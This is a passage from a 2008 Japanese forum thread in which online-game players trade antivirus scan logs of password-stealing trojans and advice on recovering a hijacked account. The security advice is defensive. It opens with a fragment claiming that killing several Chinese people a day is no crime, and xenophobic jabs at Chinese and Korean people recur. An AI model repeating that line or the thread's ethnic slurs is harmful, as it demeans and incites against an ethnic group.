中国人を 一日3人まで殺しても 罪にはなりません^^

84 名前:既にその名前は使われています [2008/03/24(月) 07:18:44.68 ID:A+UNPr50]
>>80
IDつかわれてねーよ
お前がぬるいだけじゃねーの

85 名前:既にその名前は使われています [2008/03/24(月) 07:22:21.89 ID:rCHR+RwE]
おはようございます。起きたら終わってました。

報告です。

ターゲットの選択: マイ コンピュータ
ソース: A:\; C:\; D:\; E:\; F:\; G:\;

E:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\H8OJH9OT\t1[1].exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\SBT7I6Z1\ff11[1].exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
E:\Program Files\Common Files\Microsoft Shared\MSInfo\SysInfo.wmp 感染: Trojan-Downloader.Win32.Delf.dsz スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP582\A0067565.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP582\A0067628.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP583\A0067790.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP583\A0067872.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068007.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068071.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068284.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068370.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ

86 名前:既にその名前は使われています [2008/03/24(月) 07:23:29.42 ID:rCHR+RwE]
続きです

E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP585\A0068454.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069244.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069282.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069295.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069311.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP590\A0069323.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP590\A0069332.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP590\A0069333.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP591\A0069345.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP591\A0069346.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ

87 名前:既にその名前は使われています [2008/03/24(月) 07:25:18.69 ID:rCHR+RwE]
E:\WINDOWS\Help\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\WINDOWS\Help\3EC849F38E63.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\WINDOWS\system32\1.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\WINDOWS\system32\2.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
E:\WINDOWS\system32\explorerf.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
E:\WINDOWS\system32\krnp32drv.dll 感染: Trojan-PSW.Win32.OnLineGames.pnr スキップ
E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ

これで一応全部オンラインスキャンが終わりました。
1つづつ探して何か別の場所に保存して
www.mcafee.com/japan/security/contactavert.aspへ送れば良いんでしょうか?

88 名前:80 [2008/03/24(月) 07:30:20.21 ID:QCo+vR7/]
>>84
私の場合、URLの//(ダブルスラッシュ)直後とブログIDが一緒なのですが
他の方は違うor変更することもできるのでしょうか。

間違っていた事を書き込んでしまっていたら申し訳ありません。
スルーしてください(´・ω・`)

89 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 07:48:39.60 ID:vtt50urT]
>>87
>>87 のだけでいいよ。他は復元の領域(触れない)や
IEのキャッシュ(一時ファイル消せば消える)で重複してる。
McAfee使ってるなら送り先はそこのメールで。
WebImmuneには俺アップしてるんだけど、どうも放置されてる。

90 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 07:51:12.33 ID:vtt50urT]
>>88
FC2IDはメールアドレスだったと思う。
管理画面の「ようこそ○○さん」とは関係ない。



91 名前:既にその名前は使われています [2008/03/24(月) 07:54:00.87 ID:MKZHUFJz]
>>88
詳しく書かないがブログIDとログインIDは別物。
知らないってことはブラウザにIDとパス記憶させてる?危険だよそれ。
ハックされたブログもクッキー使ってたか知りたいな。


92 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 07:54:55.32 ID:rCHR+RwE]
>>89
わかりました、探してまずは圧縮してみます<(_ _)>

93 名前:80 [2008/03/24(月) 08:06:40.96 ID:QCo+vR7/]
>>90>>91
確認してきましたが、ログインIDは記憶させていました。
そのせいだったんですねorz

>>84さん、失礼致しました。

94 名前:既にその名前は使われています [2008/03/24(月) 08:08:45.04 ID:rCHR+RwE]
あと気になったファイルがあったので載せておきますね。
オンラインスキャンの結果をメールで報告するトコがありますよね?
出てきたファイルが↓です。

kavonline0.vir
kavonline1.vir
kavonline2.vir
kavonline3.vir
kavonline4.vir
kavonline5.vir
kavonline6.vir

どこにあったのかまではわかりませんでした。

95 名前:既にその名前は使われています [2008/03/24(月) 08:09:36.93 ID:wiMjf6Lx]
Mac用のPG2みたいなソフトないですか…

96 名前:既にその名前は使われています [2008/03/24(月) 08:15:42.99 ID:vc86vULj]
>>88の言いたい事が何となく分かる。
ブログ取得するのに確かにFC2IDが必要で、それは登録したメルアドなんだけど
ブログ取得する際にブログIDが発行されて、それはブログのアドレスに組み込まれてる
 ttp://ブログID.blog××.fc2.com/
こんな感じに。

で、プラグインのリンクを使ってると、リンクの一番下に管理者ページの入り口があって
そこで求められるのは、FC2IDかブログID、どっちでも良いんだ。パスワードは両者共通。
分かりにくかったら、適当なFC2のブログから管理者ページに飛んで見てもらいたい
このへんがFC2が狙われる理由なんじゃないかと思っている。

…見当違いの事言ってたら済みません。

97 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 08:36:21.56 ID:HWQPHJQs]
>>96あってるとおもうよ

98 名前:既にその名前は使われています [2008/03/24(月) 08:40:55.56 ID:h9kMfdX+]
>>91
FC2ブログは使ってないので知らないけど、普通はIDとパス記憶させるのは
オートコンプリートの方じゃないかな

99 名前:既にその名前は使われています [2008/03/24(月) 08:42:27.44 ID:Q/ktx4QO]
>>85
おつかれさん。仮眠して少しは落ち着いたかな?

まずは、サポセンに電話して、アカウントを丸ごと止めさせるんだ。

次に、PCをネットからケーブルごと引っこ抜け。
感染している以上、外部から完全に掌握されていると思ってくれ。

それから、ブラウザの履歴見て、PCの動作ががつんと重くなったと
感じたあたりを思い出してみて。
ポイント的には、なんちゃら.jp以外のところ。

そして、ワームの検体の提出を考えるのは最後にすること。
なぜなら、既に検出できてるわけだから、カスペルスキーは対応できてる。
どれを検体とするかは、リストから拾っとくよ。

100 名前:98 mailto:sage [2008/03/24(月) 08:43:24.33 ID:h9kMfdX+]
普通はIDとパス記憶させるのは (クッキーじゃなくて)オートコンプリートの方じゃないかな
ってことね

オートコンプリート履歴とクッキーは別物だから、それぞれ別の手順で削除しないとダメ



101 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 08:45:50.22 ID:rCHR+RwE]
おはようございます<(_ _)>

>>99
上から順番に読んできましたが前スレの>>168の方と同じ症状がありましたorz
2週間前ぐらいに時計が2000年と表示されてたのを覚えています。
?と思ったんですが、気がついたときには元に戻っていたのでそのままにしておきました…
十日前にココを見ていれば防げたかもしれませんね…いまさらですがorz

サポートセンターが空くまで時間がありますので少し情報?を
攻略サイトでよく見ていたところはからくりwikiぐらいです。
それと、からくりを上げてる人のブログを2〜3箇所回りましたが覚えていませんorz
Yahooやグーグルの検索で出てきたところを見た気がします。

良く行くサイトはYouTubeとニコニコです。
その他のサイトはほとんどスレに貼られたアドレスから飛んでいました。
P2Pというとウィンニーやシェアでしょうか?
友人に勧められてインストールしましたが、設定がわからないので使った事はありません。

102 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 08:48:02.79 ID:60BI5hP8]
検知しました: ウイルス Net-Worm.Win32.Allaple.a ファイル: D:\etc\Rep\2007年\9月\FFXI 2007年09月27日18:43.htm

これやばい?

103 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 08:53:04.68 ID:HWQPHJQs]
これやばいこれやばい聞く前にウィルス名でぐぐって見ろと

104 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 08:57:00.76 ID:60BI5hP8]
ググったけど件数少なすぎてわからないんです・・・
誤検知なのかな?

105 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 08:58:10.98 ID:cSZUGl4j]
つーかヤバくないって言われたらどうすんだよw
飼ったままにしとくのか?

106 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 08:59:38.43 ID:60BI5hP8]
誤検知なんだったら処理しない?を選ぼうかと・・

107 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 09:02:28.57 ID:rCHR+RwE]
>>99
忘れてましたorz夜はありがとうございました<(_ _)>
いまは大分落ち着いています。ホント頭が真っ白になりました。

2ちゃんねるのみなさんには色々お手数をかけてしまって、本当にありがとうございます!
今、体験版をダウンロードしてインストールしてます。

追加報告ですが、公式サイトのPOL会員情報にはログインできるようになりました。
ゲームのほうは試してませんが、ログインはちょっと様子を見たほうが良いですか?

108 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 09:05:33.12 ID:HWQPHJQs]
>>102
ttp://www.f-secure.co.jp/v-descs/v-descs3/allaple-a.htm

109 名前:既にその名前は使われています [2008/03/24(月) 09:07:23.92 ID:HWQPHJQs]
おっと途中で送信
Allaple.aでぐぐって15300件も出てきました
どうやってぐぐったんだ?w

110 名前:既にその名前は使われています [2008/03/24(月) 09:13:32.82 ID:Q/ktx4QO]
>>95
ttp://phoenixlabs.org/pgosx/



111 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 09:14:18.71 ID:60BI5hP8]
net-Worm.Win32.Allaple.a
でぐぐってました

112 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 09:14:51.88 ID:RKvWaEx6]
危険といわれているブログには行った覚えがないものの
一連の騒ぎで不安になり、一応カスペルスキーでスキャンしてみたらこんなのが出てきました。

C:\Documents and Settings\Application Data\Symantec\Norton AntiVirus\Quarantine\294E6D1E.jpg 感染: Trojan.VBS.IFrame

しかしノートンでスキャンしてもなんの反応もないし、そもそもノートンのプログラムの一部に思えるのですが
これはなんらかの対策をしたほうがいいんでしょうか?

113 名前:80 [2008/03/24(月) 09:15:15.72 ID:QCo+vR7/]
まさに>>96さんの言うようにログインしていました。

キャッシュやオートコンプリートなど全て削除してみましたが
ここからならブログIDでログインできてしまうんですね。

うちはマイナーブログですがこのままFC2を使い続けるのは不安が残ります…。
やはりブログは閉鎖して、しばらく様子を見ようと思います。

114 名前:既にその名前は使われています [2008/03/24(月) 09:15:35.01 ID:QuC4Hos4]
>>112
ちょっと上のレスぐらい見ろ

115 名前:既にその名前は使われています [2008/03/24(月) 09:20:08.13 ID:rpE40Jdl]
>>107
おはようございます。PCはクリーンになるまでそれでインしない方がいいと思います
このスレでも、2度ハックされたって方もいましたし。
PG2はmiku.a.orn.jp/miku6/index.htmlでわかりやすく説明してくれてるので、
よかったら参考に。上のアドレス踏むの怖かったら、アグサで調べてからとかでも><

116 名前:既にその名前は使われています [2008/03/24(月) 09:23:57.04 ID:lzZx8A86]
>>102
ファイル名だけ見る限りは、誤検知かもしれないけど、
駆除しておいたほうがいいんじゃない?

117 名前:既にその名前は使われています [2008/03/24(月) 09:27:13.76 ID:Q/ktx4QO]
>>107
「公式サイト」が何を意味するか分からないが、
PlayOnLineにログインできたってことかな?

で、PlayOnLineにログインできたのなら、
ログインできた日時とID/pwをメモしておいて。
まずは、PCの面倒よりも自分のアカウントの状況を
□eに認識してもらうのを最優先しすべく、
>>7-9の準備しておこう。

繰り返すが、PCは常時接続にせず、必要最小限のときに接続すること。
PCを落としておくということでもかまわん。

118 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 09:28:41.97 ID:rCHR+RwE]
>>115
わかりました。しばらく様子を見てみます<(_ _)>ありがとうございます!
サイトのほうも見て来ました。簡単なようですので入れられるようなら入れてみます。

関係ないですが、このカスペルキーの検知した時の音が怖いですorz

119 名前:既にその名前は使われています [2008/03/24(月) 09:30:24.35 ID:HZjEcLif]
いやちょっと待て
垢ハックされて昨日の夜はログインできなくて今日出来るっておかしくね?
サポセンまだ開いてないぞ

ただのパスワード入力ミスじゃ…

120 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 09:31:10.08 ID:rCHR+RwE]
>>117
FF11の公式サイトにある、POL会員サポートのところにログインできました。
今からもう一度行ってみて、回線を切っておきます<(_ _)>
ありがとうございます!



121 名前:既にその名前は使われています [2008/03/24(月) 09:33:59.95 ID:Q/ktx4QO]
>>112
ttp://www.mcafee.com/japan/security/virD2003.asp?v=DoS-iFrameNet
これ読んでどうすればいいか分かれ。

122 名前:既にその名前は使われています [2008/03/24(月) 09:35:56.39 ID:lzZx8A86]
>>119
それか、業者がパスを元に戻したとかかね

123 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 09:36:11.19 ID:rCHR+RwE]
これが落ち着くまでの最後の書き込みです。
>>119
会員情報で自分が操作した履歴を見れるんですが
機能私が変更したのは一回だけですが↓のような結果が…orz

サービス利用履歴の確認 > プレイオンライン
年月日 サービス名 アクション
2008/03/24 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/03 プレイオンライン
POLパスワード 変更

124 名前:既にその名前は使われています [2008/03/24(月) 09:37:09.52 ID:rpE40Jdl]
ううん、何でPOL入れたのかな。バハスレで新しいレジコメールに送ったってあったから、それ使ったのかな?
プレイ中に落とされたって書いてたから、パスワード入力ミスって事はないんじゃないかな

125 名前:既にその名前は使われています [2008/03/24(月) 09:37:42.70 ID:rpE40Jdl]
ごめん、かぶったorz

126 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 09:39:22.55 ID:h5QlJmlh]
>>119
ログインしてる最中に後から同じIDでログインされると先にログインしてる方は落とされるんだよ。
ID、パスの間違いじゃない。
その後、ログイン合戦があってパス変更されてしまい、ログイン出来なくなったらしい。

127 名前:既にその名前は使われています [2008/03/24(月) 09:39:27.24 ID:Q/ktx4QO]
>>119
それなら、ヴァナのことは放って、PCの始末に専念できるってことさ。
今は、アカウントの保持だよ。

感染してる=ハックされてると仮定してたが、PCが感染により重くて
POLとの通信が切れたこともあり得るね。

>>120
>>119の可能性もあるので、前回落とされた時間とさっきログインできた時間を
サポセンに連絡して、その間のログインがあったかの調査を頼んでおきなはれ。

128 名前:既にその名前は使われています [2008/03/24(月) 09:40:01.67 ID:CHzqP0my]
>>123
これは怖い

129 名前:既にその名前は使われています [2008/03/24(月) 09:42:22.93 ID:wiMjf6Lx]
>>110
ありがとうございます、恩にきます

130 名前:既にその名前は使われています [2008/03/24(月) 09:43:46.33 ID:rpE40Jdl]
なんでこんなに書き換えられて?本人が書き換えたのが今日ではまだないですよね?
業者側が何度もかえてたんだろうけど・・・どうしてだろう?



131 名前:既にその名前は使われています [2008/03/24(月) 09:46:36.60 ID:Q/ktx4QO]
>>123
よく気が回ったね。いい情報拾った。
2回目以降の状況がどう見ても異常だというのが読み取れる。
それぞれのパスワード変更のときの接続元IPが違うだろうから、
それも申し入れておくといい。

で、業者側が痕跡を残さないように元に戻したとも考えられるか。
# アイテムがなくなってるか、変なところにいるはずなのでバレバレだがね。
ま、この辺は業者しか分からない訳なので、こういう例があると記憶しておこうや。

132 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 09:53:17.18 ID:h9kMfdX+]
>>126
その説明じゃまだイマイチ分らないんだけど、パスを変更されても変更する前の元のパスで
POLにログインできるってこと?
それはそれでPOLのセキュリティに問題ない?

133 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 09:57:38.66 ID:h9kMfdX+]
あぁ、ごめん勘違いしてた(´・ω・`)

134 名前:既にその名前は使われています [2008/03/24(月) 10:10:57.98 ID:Q/ktx4QO]
>>123
3時過ぎに鯖板に晒してたメアドに昨日のIDをタイトルにしたメールしてあるからなっと。

135 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 10:20:14.40 ID:xnmW2Y33]
こんなスレあったんですね。
少し前にPCが重いので、@niftyの無料ウィルスチェックしたら
Trojanなんたら、種別:トロイの木馬 というのが検出できました。
ウィルスの駆除ボタンを押しても駆除失敗と出るだけなので、
強引にそのファイルごと全消去しました…。
POLは電話してパスワード変更してもらって(←今までのパスワード忘れてしまってた)、
その後何度かウィルスチェック(@niftyのとこですが…)をかけてますが
検出されてません。
でもここ見ると、カスペルスキイというのでしか検出できないみたいですね。
ウィルスが消えてるのか、それとも単に検出できないだけなのか…

136 名前:既にその名前は使われています [2008/03/24(月) 10:25:49.35 ID:xXZ5UG8T]
個人的メモ

@niftyウイルスチェックサービス:@nifty(カスペルスキーと同じエンジンらしくてしかも駆除もしれくれるらしい)
www.nifty.com/security/vcheck/

Firefoxをこの際入れてしかも今まで2chブラウザを使ってなかった、bbs2chreaderというアドオンを入れてみよう

【韓国 中国】PeerGuardian 23【YBBを弾こう】
tmp7.2ch.net/test/read.cgi/download/1204341836/
lt;丶`∀´gt; PeerGuardian2 ★2 (`ハ´ )
pc11.2ch.net/test/read.cgi/sec/1129612402/




137 名前:既にその名前は使われています [2008/03/24(月) 10:48:24.12 ID:Q/ktx4QO]
>>135
よく消せたねぇ...

138 名前:既にその名前は使われています [2008/03/24(月) 10:48:34.53 ID:0fYn7lrn]
ログインできたのならとりあえずアイテムなくなってるかだけでも確認したほうがいいんじゃない?

139 名前:既にその名前は使われています [2008/03/24(月) 10:49:25.93 ID:Yz0CGQZ+]
パスワード変更したならログインしないほうがいい

140 名前:既にその名前は使われています [2008/03/24(月) 10:58:16.75 ID:cxfdIhE2]
>>112
それノートンがすでに隔離したファイルだと思うが
ノートンの使い方の中で隔離ファイルの削除を探すんだ

>>114
上のレスってどれ?
同様の質問がfc2ブログを見に行ったらスレにあったがそっちのこと?



141 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 11:07:19.86 ID:/brrgtmu]
>>140

114じゃないが…

FC2ブログを見に行くと垢ハックされるぞ
live27.2ch.net/test/read.cgi/ogame/1206155257/

コッチのスレとゴッチャになってしまったんじゃないかな?

>>112に関してのレスは下記参照

live27.2ch.net/test/read.cgi/ogame/1206155257/542-544

142 名前:既にその名前は使われています [2008/03/24(月) 11:08:29.60 ID:586YcECP]
>>878
感染もなにも、「Ace Password Sniffer」はオンライン販売されているソフト
フリーのパケットキャプチャソフトにパスワード抜き出しツールを被せたもの
シマンテックはこれを「好ましからざるソフト」に分類した
カスペルスキーがWinnyやShareを「好ましからざるソフト」扱いするのと同じ

みんなが説明してくれているように、リピータハブを使っていてかつ業者と
同居していなければPS2やXBOXがやり取りするデータがPCに流れることはないよ
たとえ流れても、専用の解読ツールでも作らない限りパスは抜けない


前スレの886からするとPS2なら安全ということなの?
ハブみてみたらリピーターだったんだが家には業者らしき人間はいない。

143 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 11:11:17.81 ID:QdOH9ZPy]
>>36
ブログ主が小遣い稼ぎで中華広告を埋めたという線もあるからな

144 名前:まとめ”管理”人 ◆mj63/8nmCU [2008/03/24(月) 11:14:25.55 ID:6zivGh2w]
過去ログの方のまとめ管理人です。コテワード忘れてしまったので変わります。すみません本人です。
今現在の過去ログは950〜以降が取りきれてないものが若干ありますがup完了しています。

>>79さんありがとうございます。ログ補完できました。

被害抜粋も再開していきますのでお待ち下さい。

あとサイトにも書きましたがinfoseekのメルアドが送受信不具合を起こしています。(知人からのメールで発覚)
今現在届いてるメールには返信は終わってますが返事がない方は

matome★ort.sakura.ne.jp
(ほしを@にかえてください)

お手数ですがこちらに再送よろしくおねがいします。

145 名前:ログまとめ ◆mj63/8nmCU [2008/03/24(月) 11:29:52.41 ID:6zivGh2w]
うわ・・・名前に管理と入れると自動に””が付くんですね。
他の管理の方と紛らわしいので変えました。スレ汚しすみません

146 名前:既にその名前は使われています [2008/03/24(月) 11:46:43.59 ID:E6d3p/DA]
Lirisです。先ほどサポートセンターへ連絡してきました。
ログインの履歴から、私が寝た後にログインされていて、不正アクセスの可能性が高いという事です。
一度、サポートセンターからもらったパスワードでPOLとFF11へログインしキャラクターの状態を確認。
なくなってるアイテムもなく、お金もそのままでした。

おそらく私が書き込んだあとにGMを呼んで下さった方々のおかげだと思います。
倉庫の方も無事を確認しました。キャラクターの移動もなく、ホントそのままの状態です。
ログアウトしたあと、また新しいパスワードをもらいましたので、
パソコンの方が綺麗になってからログインしようかと思います。

サポートセンターの方からウィルスの情報がありましたら教えてください、という事で
・重要な領域
E:\WINDOWS\Help\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb
E:\WINDOWS\Help\3EC849F38E63.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb
E:\WINDOWS\system32\1.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb
E:\WINDOWS\system32\2.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj
E:\WINDOWS\system32\explorerf.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj
E:\WINDOWS\system32\krnp32drv.dll 感染: Trojan-PSW.Win32.OnLineGames.pnr
E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj
を報告して来ました。

147 名前:既にその名前は使われています [2008/03/24(月) 11:48:27.80 ID:E6d3p/DA]
実際に被害(キャラ・アイテム等)にないと言うことですが、
不正にアクセスされたという結果は犯罪なので、
警察の生活安全課に、ご自身の判断で通報・被害届けを出してください、とのことです。

ここでたくさんの応援と助言をありがとうございました<(_ _)>
たぶん、みなさんがいなければ泣き寝入りしていたかもしれません。
私のような結果は、もしかすると稀なのかもしれませんが、
キャラクターがいなくなったり、アイテムがなくなったりする人が実際にいるんですよね…
こういう被害者が出ないように祈っています。

私だけではどうしようも出来なかった事だと思っていますので感謝しきれません。
本当にありがとうございました!<(_ _)>

148 名前:既にその名前は使われています [2008/03/24(月) 11:55:41.59 ID:lsU5BPJR]
>>146
被害が無くて本当に良かった。
でもハックしてログインしておきながらギルに手をつけないってなんなんだろう?
あえて取るほどでもない金額とかだと被害に合わないのかな?
参考までに所持金額が知りたいです。失礼な質問でごめん(´・ω・`)

149 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 11:57:33.35 ID:E6d3p/DA]
>>148
所持金ですか…orz
恥ずかしいですが、メインで4万ギルちょっとです(;´д⊂)
倉庫には忍術の束しか入れてませんでした。

150 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 12:00:06.03 ID:37tZuH3A]
そこまでやられてると、必要なユーザーデータをバックアップ後
初期化ー>パッチ適応ー>再インストールしたほうがいいかも

ブックマークとか忘れがちだけどね
年賀状ソフトのデータとかも忘れて入れなおしたなぁ〜今年



151 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 12:06:10.84 ID:V0clbcIb]
>>149
キャラだけチェックして、優先順位的に下位のほうにされたということかなぁ。
何はともあれお疲れさんでした。

152 名前:既にその名前は使われています [2008/03/24(月) 12:09:42.70 ID:xXZ5UG8T]
>>146
乙です
今後の人のためにその検出したアンチウィルスソフトも報告されたほうがいいですよね。
ブツは同じでもアンチウィルスソフトのメーカーによって名前が変わる事も稀によくあることですし。

153 名前:既にその名前は使われています [2008/03/24(月) 12:12:04.46 ID:lsU5BPJR]
確かにこれだけパス抜かれてる人が多いと、
業者も売り捌きやらなんやらで忙しいんだろうな…。

>>149
4万かー。参考になったよ。ありがとう(`・ω・´)

154 名前:既にその名前は使われています [2008/03/24(月) 12:17:08.53 ID:2iutMXe5]
素人なもんで教えてください
ブログが危ないのはわかったが、ELEMENとかは大丈夫なんだろか
(o・v・o)?


155 名前:既にその名前は使われています [2008/03/24(月) 12:17:20.29 ID:E6d3p/DA]
>>151
そうなのかもしれませんね…
あとは素早くたくさんの人が対処してくださった結果のだと思います。

>>152
カスペルスキー オンラインスキャナ レポート
2008年3月24日 1:20:33
OS: Microsoft Windows XP Home Edition, Service Pack 2 (Build 2600)
カスペルスキー オンラインスキャナ バージョン: 5.0.98.0
データベースの最終アップデート: 23/03/2008
データベースのレコード: 655233

↑これがスキャンした時のです。
今は体験版で削除をしてますが、>>150さんの助言どおり終わったら再インストールするつもりです。

やっと安心できますorzホント気が気じゃなかったです。
みなさんのレスがなかったら一人で悶々としてるしかなかったですよ…
何かありましたらまた報告しますね。
お礼ばっかり言ってる気がしますが、言わせてください<(_ _)>
色々とありがとうございました!

156 名前:既にその名前は使われています [2008/03/24(月) 12:21:35.09 ID:5JqdShUs]
再インストール後はWindowsUpdateを忘れずに

windowsupdate.microsoft.com/

157 名前:既にその名前は使われています [2008/03/24(月) 12:29:12.48 ID:KjMFND3D]
>>146          おつかれさまでした。キャラ無事でなによりです。


少しGMの対応かわった?前の報告だとウィルス名とか聞いてたっけ?

158 名前:既にその名前は使われています [2008/03/24(月) 12:34:14.42 ID:DC8kpJkf]
新たに福建中華の罠ドメインが登録されていたので気をつけてくれよな!
ブログ改竄騒ぎよろしく早ければすでに使われているはず。

Domain name: gamelaone■com
longyan Fujian 364000
Created: 2008-03-22

159 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 12:36:47.46 ID:cSZUGl4j]
ガメレオン涙目じゃね?

160 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 12:39:21.34 ID:rwIEyNv5]
フォルダ構成理解してない奴ばっかだな
こんなバカだらけだと垢ハックは減らないわ



161 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 12:39:47.32 ID:vQXYTLxz]
パッケ買ってせこせこと複数PC上でツール使いながら活動するよか楽に金が稼げる
手段としてやってるんだろね。



162 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 12:42:05.87 ID:DZlVuT/f]
>>146じゃないけど、二、三日前にハックにあって何も被害無し。対応の仕方も同じ。ウィルスが原因。

俺の場合、inしてる時に他からログインされて、相手とログイン合戦になった結果パス変えられてって感じ。
手持ちの他垢からGMに伝えたけど電話じゃなきゃ無理だった。

知らない誰かと自キャラでログイン合戦してる恐怖感はトラウマだわ。 長文チラ裏スマソ

163 名前:既にその名前は使われています [2008/03/24(月) 12:42:30.25 ID:cSZUGl4j]
単発で急に切れる奴何なの?w

164 名前:既にその名前は使われています [2008/03/24(月) 12:42:51.55 ID:sV5MTkg6]
とにかく■は公式の目立つところに垢ハクの注意勧告を載せるべきだな。
ネ実で対策が進んでるのに、まったくあきれるほど保身を優先する会社だぜ。

問題を認めると、問い合わせやら責任問題やらの対応に手がかかると思ってんだろうな。
■が無視してるそのあいだにも被害は拡大しているというのに。


165 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 12:43:21.80 ID:CpNX2ymN]
ところで、オートログインのネットゲームって一般的な存在なんだろうか?

166 名前:既にその名前は使われています [2008/03/24(月) 12:46:49.68 ID:xXZ5UG8T]
>>155
俺らにもだけど、そのサポートセンターさんにということでした。
紛らわしくてソマン

167 名前:既にその名前は使われています [2008/03/24(月) 12:53:18.90 ID:O+2gK/uP]
ペコログ踏んじまった。
avastとSpybot無反応だ。。
カスペ落としてスキャンせねば><

168 名前:既にその名前は使われています [2008/03/24(月) 12:58:43.37 ID:Q/ktx4QO]
>>146
ヴァナ無事確認おめでとう! 本当によかった。

>>149
いわゆる高額保有者ではなく、異次元価格品もなかったので、
業者も困ったってとこかw
君はわしか?w

で、>>150のいうとおりだと思う。
何かしら住んでる可能性あるし、バックドア1度開けられて、IP拾われてるだろうから
業者さんからアタック掛けられる可能性も残る。
ので、ウィルス対策単体ではなく、一式面倒を見てくれるソフトを入れておくのを
お勧めする。
鍵は多重に掛けるでしょ?

>>156
最近は、MicrosoftUpdateがよいよ〜。
MS-Officeのも引っかけてくれるから。

